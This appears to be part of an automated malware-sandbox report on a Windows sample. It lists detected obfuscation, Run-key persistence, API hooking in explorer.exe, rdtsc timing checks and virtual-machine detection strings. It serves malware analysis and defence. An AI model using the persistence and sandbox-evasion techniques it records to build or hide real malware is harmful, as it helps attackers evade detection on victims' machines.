    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TbOpfOXygan.exe, 00000024.00000002.3341937192.000000000018E000.00000002.00000001.01000000.00000008.sdmp

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\Uredospore8.exeUnpacked PE file: 2.2.Uredospore8.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .flat:ER;
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeUnpacked PE file: 34.2.bin.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .flat:ER;
    Source: bin.exe.3.drStatic PE information: real checksum: 0x200e6 should be: 0x1b198
    Source: Uredospore8.exeStatic PE information: real checksum: 0x200e6 should be: 0x18bbe
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_0040405C push AE79C959h; retf 0_2_00404068
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_00407422 push es; iretd 0_2_00407437
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_004016E2 push AE79C959h; retf 0_2_004016EE
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_00403F5C push AE79C959h; retf 0_2_00403F68
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_00405FD0 push ss; iretd 0_2_00405FD1
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_004015E2 push AE79C959h; retf 0_2_004015EE
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_004039A5 push AE79C959h; retf 0_2_004040EF
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_0070243E push AE79C959h; retf 0_2_0070244A
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_0070233E push AE79C959h; retf 0_2_0070234A
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D0C5B push edi; ret 2_2_006D0C97
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D0BCA push edi; ret 2_2_006D0C97
    Source: C:\Windows\SysWOW64\winver.exeCode function: 3_2_00D40BA6 push edi; ret 3_2_00D40C73
    Source: C:\Windows\SysWOW64\winver.exeCode function: 3_2_00D40C37 push edi; ret 3_2_00D40C73
    Source: C:\Windows\explorer.exeCode function: 4_2_00F80C37 push edi; ret 4_2_00F80C73
    Source: C:\Windows\explorer.exeCode function: 4_2_00F80BA6 push edi; ret 4_2_00F80C73
    Source: C:\Windows\explorer.exeCode function: 4_2_02DF0C37 push edi; ret 4_2_02DF0C73
    Source: C:\Windows\explorer.exeCode function: 4_2_02DF0BA6 push edi; ret 4_2_02DF0C73
    Source: C:\Windows\System32\sihost.exeCode function: 5_2_00D00C37 push edi; ret 5_2_00D00C73
    Source: C:\Windows\System32\sihost.exeCode function: 5_2_00D00BA6 push edi; ret 5_2_00D00C73
    Source: C:\Windows\System32\svchost.exeCode function: 6_2_00F00C37 push edi; ret 6_2_00F00C73
    Source: C:\Windows\System32\svchost.exeCode function: 6_2_00F00BA6 push edi; ret 6_2_00F00C73
    Source: C:\Windows\System32\svchost.exeCode function: 7_2_00190C37 push edi; ret 7_2_00190C73
    Source: C:\Windows\System32\svchost.exeCode function: 7_2_00190BA6 push edi; ret 7_2_00190C73
    Source: C:\Windows\System32\ctfmon.exeCode function: 8_2_009E0C37 push edi; ret 8_2_009E0C73
    Source: C:\Windows\System32\ctfmon.exeCode function: 8_2_009E0BA6 push edi; ret 8_2_009E0C73
    Source: C:\Windows\System32\svchost.exeCode function: 9_2_00840C37 push edi; ret 9_2_00840C73
    Source: C:\Windows\System32\svchost.exeCode function: 9_2_00840BA6 push edi; ret 9_2_00840C73
    Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 10_2_00EE0C37 push edi; ret 10_2_00EE0C73
    Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 10_2_00EE0BA6 push edi; ret 10_2_00EE0C73
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 11_2_00A40C37 push edi; ret 11_2_00A40C73
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 11_2_00A40BA6 push edi; ret 11_2_00A40C73
    Source: Uredospore8.exeStatic PE information: section name: .text entropy: 6.821035285186627
    Source: bin.exe.3.drStatic PE information: section name: .text entropy: 6.821035285186627
    Source: C:\Windows\SysWOW64\winver.exeFile created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run E6B93DA9Jump to behavior
    Source: C:\Windows\System32\ctfmon.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run E6B93DA9Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run E6B93DA9Jump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
    Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
    Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwResumeThread new code: 0xE9 0x9E 0xE1 0x12 0x25 0x51
    Source: C:\Users\user\Desktop\Uredospore8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\System32\dllhost.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_15-2377
    Source: C:\Windows\System32\svchost.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_6-2344
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
    Source: C:\Users\user\Desktop\Uredospore8.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_2-3528
    Source: C:\Windows\System32\conhost.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
    Source: C:\Windows\System32\RuntimeBroker.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_11-2442
    Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
    Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_10-2344
    Source: C:\Windows\explorer.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_4-4867
    Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Windows\SysWOW64\winver.exeRDTSC instruction interceptor: First address: D430A9 second address: D430D2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 stosd 0x00000005 mov eax, dword ptr [ebx+004043BDh] 0x0000000b stosd 0x0000000c mov eax, dword ptr [ebx+004043C1h] 0x00000012 stosd 0x00000013 mov eax, dword ptr [ebx+004069C0h] 0x00000019 stosd 0x0000001a mov eax, dword ptr [ebx+004069C4h] 0x00000020 stosd 0x00000021 lea eax, dword ptr [ebp-00000700h] 0x00000027 sub edi, eax 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D0849 rdtsc 2_2_006D0849
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 786Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 757Jump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-3543
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
    Source: C:\Users\user\Desktop\Uredospore8.exeAPI coverage: 9.6 %
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeAPI coverage: 4.9 %
    Source: C:\Windows\System32\dllhost.exeFile opened: PhysicalDrive0Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
    Source: C:\Windows\System32\ctfmon.exeLast function: Thread delayed
    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
    Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeLast function: Thread delayed
    Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
    Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeLast function: Thread delayed
    Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
    Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
    Source: C:\Windows\System32\smartscreen.exeLast function: Thread delayed
    Source: C:\Windows\System32\ApplicationFrameHost.exeLast function: Thread delayed
    Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
    Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeLast function: Thread delayed
    Source: explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
    Source: SearchApp.exe, 0000000D.00000000.2288200071.0000027A7E800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: com.squirrel.FACEITApp.FACEITcom.squirrel.Postman.PostmanVMware.Workstation.vmui
    Source: explorer.exe, 00000004.00000000.2196219993.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
    Source: explorer.exe, 00000004.00000000.2192850877.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000004.00000002.3431957145.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000978C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3401335035.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222969318.000001F69890B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: SearchApp.exe, 0000000D.00000000.2306449484.0000027A80982000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
    Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: winver.exe, 00000003.00000002.3345685766.0000000000E28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
    Source: SearchApp.exe, 0000000D.00000000.2288200071.0000027A7E800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.View.Client
    Source: explorer.exe, 00000004.00000000.2196219993.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
    Source: SearchApp.exe, 0000000D.00000003.2356316437.0000027A963CC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemu10642
    Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 12 playerta cityy
    Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 15 player12watchtower translation systemtsz
    Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vm ware8394
    Source: SearchApp.exe, 0000000D.00000000.2284398647.0000027A7E2F2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
    Source: SearchApp.exe, 0000000D.00000003.2281551134.0000027A963DB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 5470*|hourly analysis program 4.50*|hap1*|hourly analysis program 4.80*|hap1*|hourly analysis program 4.90*|hap375*|hourly analysis program 4.91*|hap1*|hourly analysis program 5.01*|hap1*|hourly analysis program 5.10*|hap1*|hourly analysis program 5.11*|hap114*|hp scan*|scanner6717*|hp scan*|hpscan6355*|hp scan and capture*|hpscan6530*|hp smart*|hp printer5188*|hp smart*|hpsmart6013*|hp smart*|hp sca9057*|hp support assistant*|hp ass4184*|hp support assistant*|hps5179*|hp unified functional testing*|uft1*|hpe content manager*|trim1743*|hpe records manager*|trim1399*|hpe unified functional testing*|uft1*|huawei operation & maintenance system*|lmt1*|hulu*|huliu7717*|hulu*|hullu8132*|hulu*|huluu8464*|hulu*|huku5970*|hulu*|hule8326*|hulu*|julu8142*|hulu*|hlu6552*|hulu*|huu6329*|hwmonitor*|cpui5297*|hy-8 7.50*|hy81652*|hyper-v manager*|hyper v4919*|hyper-v manager*|virtual5441*|hyper-v manager*|hyperv4178*|hyper-v manager*|vm4595*|hyperspace*|epic708*|i.r.i.s. ocr registration*|iris1117*|ibm integration toolkit 10.0.0.10*|iib1*|ibm integration toolkit 10.0.0.11*|iib1*|ibm integration toolkit 10.0.0.12*|iib1*|ibm integration toolkit 10.0.0.13*|iib1*|ibm integration toolkit 10.0.0.15*|iib1*|ibm integration toolkit 10.0.0.7*|iib403*|ibm notes*|lotus2695*|ibm notes (basic)*|lotus3079*|ic business manager*|icb1577*|icloud*|i cloud5863*|icloud*|icould6247*|icloud*|iclu6932*|icloud photos*|pictures4048*|icloud photos*|i cloud5074*|icloud photos*|iphoto5036*|idle (python 3.7 32-bit)*|idel6028*|idle (python 3.7 64-bit)*|idel5996*|idle (python gui)*|python idle5336*|iheartradio*|i heart4638*|image composite editor*|ice852*|import passwords*|lastpass1242*|income tax planner*|bna1*|income tax planner workstation*|bna1*|inform*|ddi600*|information assistant*|ia1*|instagram*|instagra,10481*|instagram*|instagrm10522*|instagram*|instgram9142*|instagram*|instra10065*|instagram*|insat9464*|instagram*|insra10498*|instagram*|insts10256*|instagram*|isnta8095*|instagram*|inss10150*|instagram*|insy10074*|instagram*|ista9884*|instrument de decupare*|snipp3115*|intapp time*|dte2830*|integrated architecture builder*|iab1*|integrated dealer systems - g2*|ids1249*|integrated operations system*|ios1*|intel(r) extreme tuning utility*|xtu1972*|intellij idea community edition 2019.1.3*|inteli4762*|interaction administrator*|ia2559*|interactive ruby*|irb416*|interactive sql*|dbisql959*|internet download accelerator*|ida842*|internet download manager*|idman7834*|internet download manager*|idmm8541*|internet download manager*|intr7920*|internet download manager*|don8066*|internet download manager*|id,7596*|internet download manager*|idn6970*|internet download manager*|imd6996*|internet download manager*|ine9116*|internet download manager*|
    Source: SearchApp.exe, 0000000D.00000000.2288256816.0000027A7E80D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe{6D809377-6AF0-444B-8957-A3773F02200E}\JetBrains\PhpStorm 2018.1.6\bin\phpstorm64.exe963
    Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 12 player*|vmpl5459
    Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|*|vmware6886
    Source: SearchApp.exe, 0000000D.00000003.2299223713.0000027A98002000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281551134.0000027A963DB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281318447.0000027A96702000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|vm4595
    Source: SearchApp.exe, 0000000D.00000000.2288200071.0000027A7E800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Horizon.Client
    Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vmare7220
    Source: RuntimeBroker.exe, 0000000B.00000002.3354827834.000002C8A4C58000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware horizon client
    Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 15 player*|vmplayer6438
    Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vlc media playere - insiderssrecord audio:wux:record audiovmware vsphere client
    Source: svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
    Source: SearchApp.exe, 0000000D.00000003.2299223713.0000027A98002000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2289266754.0000027A7E922000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281318447.0000027A96702000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|*|qemu10642
    Source: SearchApp.exe, 0000000D.00000000.2306449484.0000027A80991000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2307269362.0000027A80A37000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2265953547.000002727CFAF000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2297626222.0000027A7EC2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
    Source: SearchApp.exe, 0000000D.00000003.2356316437.0000027A963CC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: /qemu10642
    Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 12 player
    Source: SearchApp.exe, 0000000D.00000003.2299223713.0000027A98002000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281551134.0000027A963DB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281318447.0000027A96702000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyperv4178
    Source: SearchApp.exe, 0000000D.00000000.2288200071.0000027A7E800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmui
    Source: SearchApp.exe, 0000000D.00000003.2299223713.0000027A98002000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281551134.0000027A963DB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281318447.0000027A96702000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|virtual5441
    Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 15 player
    Source: svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2263340509.00000272779A5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: SearchApp.exe, 0000000D.00000000.2288200071.0000027A7E800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmplayer
    Source: explorer.exe, 00000004.00000000.2196219993.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
    Source: svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;n
    Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vspe6388
    Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware vsphere client
    Source: SearchApp.exe, 0000000D.00000000.2274880792.0000027A7D535000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2273444241.000002727D3A2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: del:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
    Source: SearchApp.exe, 0000000D.00000000.2288256816.0000027A7E80D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe
    Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vdi3894
    Source: SearchApp.exe, 0000000D.00000003.2299223713.0000027A98002000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281551134.0000027A963DB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281318447.0000027A96702000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyper v4919
    Source: explorer.exe, 00000004.00000000.2195839667.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
    Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|view5503
    Source: svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
    Source: explorer.exe, 00000004.00000000.2192850877.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
    Source: explorer.exe, 00000004.00000000.2196219993.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
    Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vcenter5038
    Source: explorer.exe, 00000004.00000000.2192850877.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: C:\Users\user\Desktop\Uredospore8.exeAPI call chain: ExitProcess graph end nodegraph_2-3168
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeAPI call chain: ExitProcess graph end node
    Source: C:\Windows\SysWOW64\winver.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D0849 rdtsc 2_2_006D0849
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_004030C1 mov eax, dword ptr fs:[00000030h]0_2_004030C1
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_004030CD mov eax, dword ptr fs:[00000030h]0_2_004030CD
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_007002AE mov eax, dword ptr fs:[00000030h]0_2_007002AE
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_00700D34 mov eax, dword ptr fs:[00000030h]0_2_00700D34
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_00401000 mov eax, dword ptr fs:[00000030h]2_2_00401000
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D4071 mov edi, dword ptr fs:[00000030h]2_2_006D4071
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D0CA4 mov eax, dword ptr fs:[00000030h]2_2_006D0CA4
    Source: C:\Windows\SysWOW64\winver.exeCode function: 3_2_00D40C80 mov eax, dword ptr fs:[00000030h]3_2_00D40C80
    Source: C:\Windows\SysWOW64\winver.exeCode function: 3_2_00D4404D mov edi, dword ptr fs:[00000030h]3_2_00D4404D
    Source: C:\Windows\explorer.exeCode function: 4_2_00F80C80 mov eax, dword ptr fs:[00000030h]4_2_00F80C80
    Source: C:\Windows\explorer.exeCode function: 4_2_00F8404D mov edi, dword ptr fs:[00000030h]4_2_00F8404D
